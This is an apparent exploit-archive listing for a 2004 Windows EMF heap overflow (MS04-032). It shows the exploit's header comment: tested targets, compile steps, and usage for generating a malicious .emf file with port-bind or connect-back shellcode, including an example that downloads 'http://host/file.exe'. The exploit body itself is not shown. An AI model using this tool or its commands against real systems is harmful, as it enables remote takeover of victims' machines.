Win_emf_HeapOverflow_MS04-032.c提交时间:2004-10-21 提交用户:dav1d 工具分类:攻击程序 运行平台:Windows 工具大小:9024 Bytes 文件MD5 :934559e3179b9305093e1c4d4ce01862 工具来源:k-otik /* HOD-ms04032-emf-expl2.c: * * (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow * * Exploit version 0.2 (PUBLIC) coded by * * * .::[ houseofdabus ]::. * * * [at inbox dot ru] * ------------------------------------------------------------------- * About WMF/EMF: * Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats * are vector files that can contain a raster image... * * ------------------------------------------------------------------- * The vulnerability will be triggered by either viewing a malicious * file or by navigating to a directory, which contains a malicious * file and displays it as a thumbnail. * * Graphics Rendering Engine Vulnerability - CAN-2004-0209 * ------------------------------------------------------------------- * Tested on: * - Internet Explorer 6.0 (SP1) (iexplore.exe) * - Explorer (explorer.exe) * - Windows XP SP1 * * ------------------------------------------------------------------- * Compile: * Win32/VC++ : cl HOD-ms04032-emf-expl.c * Win32/cygwin: gcc HOD-ms04032-emf-expl.c -lws2_32.lib * Linux : gcc -o HOD-ms04032-emf-expl HOD-ms04032-emf-expl.c * * ------------------------------------------------------------------- * Command Line Parameters/Arguments: * * HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP] * * Shellcode: * 1 - Portbind shellcode * 2 - Connectback shellcode * * ------------------------------------------------------------------- * Examples: * * C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777 * * C:\>HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe * * ------------------------------------------------------------------- * * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission to * do so. * */ >> 下载 << |
